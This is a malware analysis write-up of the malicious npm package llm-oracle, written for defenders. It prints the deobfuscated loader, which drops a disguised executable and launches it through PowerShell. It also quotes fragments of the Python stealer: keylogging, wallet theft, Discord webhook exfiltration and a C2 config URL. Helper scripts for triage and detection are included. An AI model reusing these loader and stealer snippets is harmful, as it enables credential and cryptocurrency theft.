NPM Package Security: llm-oracle Analysis

Introduction

In this article, we delve into the analysis of a malicious NPM package, llm-oracle, exploring its behavior, payloads, and the techniques used to evade detection. This article was inspired by, and extends, earlier write-ups from SafeDep and Socket.dev. By the end of this article, you’ll not only understand the nature of the attack but also:

Grasp the methodology behind analyzing malicious NPM packages.
Explore how we reversed and deobfuscated the malware to understand its behavior.
Understand the tactics used by the attacker to compromise systems and avoid detection.
Learn about the advanced techniques employed by the malware, including PowerShell and PyInstaller usage.
Gain insights into key indicators of compromise (IOCs) and the implications for defending against such attacks.

Below, we will explore the details of the llm-oracle supply chain attack, its analysis, deobfuscation process, and the insights gained from interacting with the Command & Control (C2) infrastructure.

Inside the Package (Analysis & Reversing)

The first step was to pull the package metadata from the npm registry and confirm that the package was still available.

>>>> npm view llm-oracle

llm-oracle@1.0.2 | MIT | deps: 28 | versions: 3
https://github.com/llm-oracle/msal#readme

keywords: oracle, llm, offchain, evm, ethereum
dist
.tarball: https://registry.npmjs.org/llm-oracle/-/llm-oracle-1.0.2.tgz
.shasum: 06b940685db1d376a17c178b88cd222635c500a7
.integrity: sha512-5HwwW+J7Ws3Po0jrfs3K5xN0Nu4V130Ys/Gj4yLSKDsUriHF8WIih4jwulD6efVeghNPZQ2a7cGvpn/UimrMEg==
.unpackedSize: 16.8 MB

dependencies:
acorn-jsx: ^3.0.1            escape-string-regexp: ^1.0.5 isarray: ^1.0.0
(...and 4 more.)
maintainers:
- josh.weavery <josh.weavery@gmail.com>

dist-tags:
latest: 1.0.2
published 4 months ago by josh.weavery <josh.weavery@gmail.com>
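To repeat this lookup from a script (for example, when triaging many packages at once), the registry's JSON document for a package can be queried directly. The sketch below assumes the public endpoint https://registry.npmjs.org/<name> and the standard registry fields (dist-tags, versions, time, maintainers, dist); summarize() and its install-hook check are our own illustrative helpers, not part of any npm tooling.

```python
import json
import urllib.parse
import urllib.request

REGISTRY = "https://registry.npmjs.org"  # public npm registry
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def fetch_packument(name: str) -> dict:
    """Download the full registry document ("packument") for a package."""
    # Scoped names such as @scope/pkg need the '/' percent-encoded
    url = f"{REGISTRY}/{urllib.parse.quote(name, safe='@')}"
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.load(resp)


def summarize(packument: dict) -> dict:
    """Extract the triage fields that `npm view` prints for the latest version."""
    latest = packument["dist-tags"]["latest"]
    manifest = packument["versions"][latest]
    dist = manifest.get("dist", {})
    scripts = manifest.get("scripts", {})
    return {
        "version": latest,
        "published": packument.get("time", {}).get(latest),
        "maintainers": [m.get("name") for m in packument.get("maintainers", [])],
        "tarball": dist.get("tarball"),
        "shasum": dist.get("shasum"),
        "integrity": dist.get("integrity"),
        "unpacked_size": dist.get("unpackedSize"),
        # Our own heuristic: lifecycle hooks run code automatically at install time
        "install_hooks": [h for h in INSTALL_HOOKS if h in scripts],
    }
```

For example, summarize(fetch_packument("llm-oracle")) should report the same version, maintainer and dist fields that npm view printed above, assuming the registry still serves the original metadata.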

This output already gives useful context: the maintainer and publisher (josh.weavery), the tarball URL, shasum and integrity hash of the latest version (1.0.2), and an unpacked size of 16.8 MB, which is large for a package that ships only a handful of files. Next, we retrieved the tarball and extracted its contents for in-depth local analysis. Inside the archive, we found the following files:

Base64Decode.ts
HISTORY.md
LICENSE
README.md
index.js
package.json
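Before opening the archive, it is worth confirming that the downloaded tarball matches the .integrity and .shasum values reported by the registry, and listing its entries without extracting anything to disk. The following is a minimal standard-library sketch; it assumes a single sha512 entry in the integrity string (npm's usual format) and a gzip-compressed tarball.

```python
import base64
import hashlib
import io
import tarfile


def verify_sri(data: bytes, integrity: str) -> bool:
    """Compare data with an npm integrity string such as 'sha512-<base64 digest>'."""
    algo, _, expected = integrity.partition("-")
    digest = hashlib.new(algo, data).digest()
    return base64.b64encode(digest).decode("ascii") == expected


def verify_shasum(data: bytes, shasum: str) -> bool:
    """Compare data with the legacy hex-encoded SHA-1 'shasum' field."""
    return hashlib.sha1(data).hexdigest() == shasum.lower()


def list_members(data: bytes) -> list:
    """Return (name, size) for every entry in a .tgz, without extracting anything."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        return [(m.name, m.size) for m in tar.getmembers()]
```

With the archive read into data (open(..., "rb").read()), call verify_sri(data, ...) with the full .integrity value from npm view and verify_shasum(data, "06b940685db1d376a17c178b88cd222635c500a7"); list_members(data) then shows the files, which npm tarballs keep under a package/ prefix (for example package/Base64Decode.ts).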

Running the file command on Base64Decode.ts surfaced a significant malware indicator on its own: despite its TypeScript extension, the file is a Windows executable.

Base64Decode.ts: PE32+ executable (GUI) x86-64, for MS Windows
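The same check can be automated, which helps when scanning many packages for binaries hiding behind source-file extensions. This sketch parses just enough of the PE/COFF headers (the MZ stub, e_lfanew, the PE signature, Machine, and the optional header's Magic and Subsystem fields) to reproduce the verdict above; the helper names and the set of "expected" binary extensions are our own assumptions.

```python
import os
import struct

MACHINES = {0x8664: "x86-64", 0x14C: "Intel 80386"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
BINARY_EXTENSIONS = {".exe", ".dll", ".sys"}  # assumption: extensions where a PE is expected


def describe_pe(data: bytes):
    """Return a file(1)-style summary if data is a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    # e_lfanew (offset 0x3C in the DOS header) points at the "PE\0\0" signature
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    opt = pe_offset + 24  # 4-byte signature + 20-byte COFF file header
    if len(data) < opt + 70 or data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        return None
    (machine,) = struct.unpack_from("<H", data, pe_offset + 4)  # COFF Machine field
    (magic,) = struct.unpack_from("<H", data, opt)  # 0x10B = PE32, 0x20B = PE32+
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    kind = OPTIONAL_MAGIC.get(magic, "PE")
    sub = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
    arch = MACHINES.get(machine, hex(machine))
    return f"{kind} executable ({sub}) {arch}"


def is_disguised_binary(filename: str, data: bytes) -> bool:
    """Flag PE images whose file extension does not announce a Windows binary."""
    ext = os.path.splitext(filename)[1].lower()
    return describe_pe(data) is not None and ext not in BINARY_EXTENSIONS
```

Applied to Base64Decode.ts, describe_pe() should print a summary equivalent to the file output, and is_disguised_binary() flags it because .ts is not an executable extension.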

Upon further inspection, the index.js file contained obfuscated code, which, once decoded, revealed the following:

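// Build %LOCALAPPDATA%\chrome.exe; the \u escapes spell "chrome.exe", and replace() strips '+' characters, which has no effect on this string
const targetFilePath = path.join(process.env.LOCALAPPDATA, String('\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065').replace(/\+/g, ''));
// Drop the payload only once: do nothing if chrome.exe already exists
if (!fs.existsSync(targetFilePath)) {
  // Wait 60 seconds (60000 ms) before acting, plausibly to outlast short automated sandbox runs
  setTimeout(() => {
    // modelFilePath (defined elsewhere, not shown) points to the bundled Base64Decode.ts executable
    fs.copyFileSync(modelFilePath, targetFilePath);
    // Launch the copy via PowerShell, bypassing the execution policy and requesting elevation (-Verb RunAs)
    exec(`powershell -ExecutionPolicy Bypass Start-Process -FilePath '${targetFilePath}' -Verb RunAs`, (err, stdout, stderr) => {}); // errors and output are silently ignored
  }, 60000);
}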

Deobfuscation of the Malware

We proceeded to decode the obfuscated strings and found:

\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065 → chrome.exe
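Escapes like these are easy to reverse in bulk. The helper below is a sketch that rewrites every four-digit \uXXXX escape in a JavaScript source string into its literal character, so all of index.js can be made readable in one pass. It does not handle other escape forms such as \xNN or \u{...}, and it does not combine surrogate pairs.

```python
import re

# Four-digit JavaScript unicode escapes such as \u0063
_JS_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def decode_js_unicode_escapes(text: str) -> str:
    """Replace every \\uXXXX escape in text with the character it encodes."""
    return _JS_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
```

Applied to the string above it returns chrome.exe. Because that result contains no '+' characters, the .replace(/\+/g, '') call in the loader leaves it unchanged.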

The decoded loader shows that the Base64Decode.ts executable was copied to %LOCALAPPDATA% as chrome.exe after a 60-second delay and then launched through PowerShell. Further analysis of this executable revealed that it was a Python script packaged as a Windows executable with PyInstaller.
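A quick way to confirm the PyInstaller verdict is to look for the archive "cookie" that PyInstaller writes at the end of the archive it appends to its bootloader. This sketch assumes the cookie magic used by PyInstaller's CArchive format (the bytes MEI\x0c\x0b\x0a\x0b\x0e). It is a heuristic presence check, not an extractor; extraction is better left to dedicated tooling such as PyInstaller's own pyi-archive_viewer.

```python
# Magic bytes of the CArchive cookie in PyInstaller bundles (octal MEI\014\013\012\013\016)
PYINSTALLER_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def find_pyinstaller_cookie(data: bytes) -> int:
    """Return the offset of the last cookie magic in data, or -1 if it is absent."""
    # The archive is appended to the bootloader, so the cookie sits near the end of the file
    return data.rfind(PYINSTALLER_COOKIE_MAGIC)


def looks_like_pyinstaller_exe(data: bytes) -> bool:
    """Heuristic: a Windows PE (MZ header) that also carries a PyInstaller cookie."""
    return data[:2] == b"MZ" and find_pyinstaller_cookie(data) != -1
```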

After extracting the PyInstaller archive from the executable, we found several interesting files, including OH8xADfF8q.pyc, whose strings pointed to cryptocurrency wallet exfiltration, credential harvesting, and other malicious activities.

One of the key payloads was:

import os
exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtl...', 'utf-8')).decode('utf-8'))

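The payload is base64-encoded twice: the visible prefix of the outer string, aW1wb3J0IGJhc2U2NDtl, decodes to import base64;e..., the start of a second decode-and-exec stage, which ultimately yields a Python script that performs conventional malware activities.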
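Because each stage is just exec(base64.b64decode(...)), the layers can be peeled statically instead of running the payload. The sketch below assumes every stage passes a single quoted base64 literal to b64decode, optionally wrapped in bytes(...), as in the snippet above; real samples may need a looser pattern. Nothing is executed: each layer is only decoded and returned for reading.

```python
import base64
import binascii
import re

# Quoted argument of a b64decode(...) call, with or without a bytes(...) wrapper
_B64_CALL = re.compile(r"b64decode\(\s*(?:bytes\(\s*)?b?['\"]([A-Za-z0-9+/=]+)['\"]")


def peel_base64_layers(source: str, max_layers: int = 10) -> list:
    """Statically decode nested exec(base64.b64decode(...)) stages; never calls exec."""
    layers = [source]
    for _ in range(max_layers):
        match = _B64_CALL.search(layers[-1])
        if not match:
            break  # no further encoded stage found
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break  # not valid base64 text; stop rather than guess
        layers.append(decoded)
    return layers
```

The last element of the returned list is the innermost readable stage; the earlier elements are kept so each wrapper can be documented.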

Here are some of the lines from the decoded malicious code:

import os, discord, subprocess, requests, re, json, base64, shutil, sqlite3, winreg, sys, win32crypt
import time
import keyboard
import psutil
import ctypes
from base64 import b64decode
from Crypto.Cipher import AES
# ... many more import statements ...

try:
    # Generate a unique identifier
    unique_id = str(uuid.uuid4())[:8]  # Get the first 8 characters of the UUID

    # Construct the filename with the unique identifier
    zip_file_name = f"{name}-{unique_id}"

    # ... many more lines ...

Let’s break down what this code actually does:

# Environment Variable Retrieval
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")

This code retrieves paths to critical directories on a Windows system, which are often used to store user-specific data. Malware can use these paths to access sensitive information or store malicious files.

# Collecting Browser Profiles
profiles_path = os.getenv('LOCALAPPDATA') + "\\Google\\Chrome\\User Data"
profiles = [d for d in os.listdir(profiles_path) if os.path.isdir(os.path.join(profiles_path, d)) and (d.startswith("Profile") or d == "Default")]

This code collects the paths to Chrome user profiles. Malware often targets browser data to extract saved passwords, cookies, and other sensitive information.

# Keylogging
def on_key_press(event: object):
    global current_string
    current_string += event.name

This function captures keystrokes and appends them to a string. Keylogging is a common technique used by malware to capture user inputs, including passwords and sensitive information.

clipboard_monitor.on_update(print)

This line sets up a clipboard monitor to capture any changes made to the clipboard. Malware can exploit this to steal sensitive data that users copy, such as passwords or credit card numbers.

requests.post(webhook_url, files=payload)

This line sends collected data (like screenshots or keystrokes) to a specified Discord webhook URL. This is a common method for malware to exfiltrate data to a remote server controlled by the attacker.
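Discord webhook URLs have a recognizable shape (an api/webhooks path followed by a numeric ID and a token), which makes them a practical IOC to search for in extracted strings, proxy logs, or memory dumps. In this sample the webhook is created at runtime (see the on_ready handler below), so a static scan of the payload may find nothing; the pattern is more useful against network or runtime artifacts. The regex and the hostname variants it accepts are our own assumptions, and the sketch truncates the token so matches can be shared safely.

```python
import re

# Assumed URL shape: optional ptb./canary. subdomain, discord.com or discordapp.com,
# optional API version segment, then /webhooks/<numeric id>/<token>
WEBHOOK_RE = re.compile(
    r"https://(?:(?:ptb|canary)\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/(\d+)/([A-Za-z0-9_-]+)"
)


def find_webhooks(text: str) -> list:
    """Return (webhook_id, truncated_token) pairs for every webhook URL in text."""
    return [(wid, token[:4] + "...") for wid, token in WEBHOOK_RE.findall(text)]
```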

extension_wallet_list = [
    {"name": "metamask", "folder": "nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"name": "tronlink", "folder": "ibnejdfjmmkpcnlpebklmnkoeoihofec"},
    {"name": "trustwallet", "folder": "egjidjbpglichdcondbcbdnbeeppgdph"},
    # ... other wallet extensions
]

This list defines several popular cryptocurrency wallet extensions and their corresponding folder names within the Chrome user data directory. The malware targets these wallets to extract sensitive information, such as private keys or passwords.
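The same extension IDs double as detection strings. Chrome extension IDs are 32 characters drawn from the letters a to p, so a scanner can pull every candidate ID out of decoded payload text and label the ones known to belong to wallets. The lookup table below contains only the three IDs shown above; extending it with the elided entries is left to the reader, and the helper name is our own.

```python
import re

# Wallet extension IDs taken from the payload's list above (only the three shown)
KNOWN_WALLET_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "metamask",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec": "tronlink",
    "egjidjbpglichdcondbcbdnbeeppgdph": "trustwallet",
}

# Chrome extension IDs: exactly 32 characters from the range a-p
_EXTENSION_ID = re.compile(r"\b[a-p]{32}\b")


def find_extension_ids(text: str) -> dict:
    """Map every extension ID found in text to a known wallet name, or 'unknown'."""
    found = sorted(set(_EXTENSION_ID.findall(text)))
    return {ext_id: KNOWN_WALLET_EXTENSIONS.get(ext_id, "unknown") for ext_id in found}
```

A payload that references many of these IDs at once is a strong hint that it is a wallet stealer rather than a legitimate tool.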

def Z1P7H1N65(path, arg, procc):
    # ... other code
    if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
        browser = path.split("\\")[4].split("/")[1].replace(' ', '')
        name = f"Metamask_{browser}"
        pathC = path + arg

    # ... similar checks for other wallet extensions

    if not os.path.exists(pathC): return
    subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)

    shutil.make_archive(zip_file_path, 'zip', pathC)

The function checks whether specific wallet folder names appear in the argument (arg). If a match is found, it constructs the path to the wallet's data directory and returns early if that directory does not exist. It then force-kills the associated browser process tree (procc, e.g. Chrome) so that the wallet files are not locked or modified while they are being zipped. Finally, it creates a ZIP archive of the wallet's data, which can then be exfiltrated to the attacker's server.
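The browser label comes from the odd-looking path.split("\\")[4].split("/")[1] expression. To see what it extracts, assume (this is our guess; the payload's call sites are not shown) that path is %LOCALAPPDATA% with forward-slash components appended, for a hypothetical user bob. The fifth backslash-separated piece is then "Local/Google/Chrome/...", and its second slash-separated component is the vendor folder.

```python
def browser_label(path: str) -> str:
    # Mirrors the payload's expression: 5th backslash-separated part, then its 2nd slash-separated part
    return path.split("\\")[4].split("/")[1].replace(" ", "")


# Hypothetical path layout: %LOCALAPPDATA% for user "bob" plus forward-slash components
example = "C:\\Users\\bob\\AppData\\Local" + "/Google/Chrome/User Data/Default/Local Extension Settings/"
print(browser_label(example))  # Google
```

Under this assumption the MetaMask archive would be named Metamask_Google. The expression relies on a fixed path depth, so it would break for unusual profile locations.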

@bot.event
async def on_ready():
    global channel_password
    global webhook_url

    guild = bot.get_guild(int(guild_id))

    existing_channel = discord.utils.get(guild.text_channels, name=session_id)

    if existing_channel:
        # If the channel already exists, use it
        channel = existing_channel
    else:
        # If the channel doesn't exist, create a new one
        channel = await guild.create_text_channel(session_id)

    # ... additional setup for the channel

When the bot is ready, it retrieves the guild (server) using the guild_id. It checks if a text channel with the name defined in session_id already exists. If it does, the bot uses that channel; otherwise, it creates a new channel with that name. This allows the malware to have a dedicated channel for sending collected data or receiving commands from the attacker.

webhook = await channel.create_webhook(name="hook_chl")
webhook_url = webhook.url

config_url = "https://bayard-front-833a4.web.app/start.dat"
# Send a GET request to the URL
config_response = requests.get(config_url)
# Load the JSON data from the response content
config_data = json.loads(config_response.content)
# Access the specific value from the JSON data
guild_id = config_data['gid'].replace(" ", "").replace("_", "")
token = config_data['tkn'].replace(" ", "").replace("_", "")

The start.dat file contains important configuration information needed for the Discord bot to function correctly. Specifically, it includes:

gid: The ID of the Discord guild (server) where the bot will operate.
tkn: The token used to authenticate and run the Discord bot.

Our next goal was to see what start.dat actually contains. We requested the file from the attacker's server and downloaded it; it contained the gid and tkn values in JSON format.
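Since start.dat is plain JSON, a saved copy can be inspected offline without running any of the malware. The sketch applies the same space and underscore stripping as the payload (the reason for that padding is not stated; one plausible guess is that it keeps the raw token from matching automated secret scanners) and masks the token so it can go into a report. The helper names are our own.

```python
import json


def redact(secret: str, keep: int = 4) -> str:
    """Mask the middle of a secret so it can be shared in a report."""
    if len(secret) <= keep * 2:
        return "*" * len(secret)
    return secret[:keep] + "*" * (len(secret) - keep * 2) + secret[-keep:]


def parse_start_dat(raw: bytes) -> dict:
    """Parse a saved start.dat offline, normalizing values the way the payload does."""
    config = json.loads(raw)
    # Same clean-up as the payload: remove spaces and underscores from both fields
    guild_id = config["gid"].replace(" ", "").replace("_", "")
    token = config["tkn"].replace(" ", "").replace("_", "")
    return {"guild_id": int(guild_id), "token_redacted": redact(token)}
```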

Going Behind the Attacker

Further investigation into the Command & Control (C2) communication bootstrapped by this JSON configuration revealed the following malicious actions:

Connects to the Discord server using a Guild ID and Token.
Creates new channels and starts a keylogger.
Takes screenshots and sends keystrokes to the server.
Establishes full command and control.
Transfers files (if greater than 25MB) via a geo-fenced service.

Conclusion

Our analysis of the llm-oracle NPM package confirmed it as a malicious package designed to deploy a Windows executable that facilitated a range of malware activities. Although the packaging and obfuscation were relatively simple, the attackers layered several evasion techniques: an executable disguised as a TypeScript file, a delayed PowerShell launch with the execution policy bypassed, a PyInstaller-packed Python payload, and nested base64 encoding.

We successfully decompiled the entire malware package, allowing us to map out its full behavior, including interactions with C2 servers and the exploitation of crypto wallets. This investigation provides valuable insights into the attacker’s tactics, techniques, and procedures (TTPs), which will aid in strengthening defenses against similar attacks. The attackers’ use of evasive techniques and undetected payload execution underscores the importance of proactive threat hunting and continuous monitoring of the software supply chain.
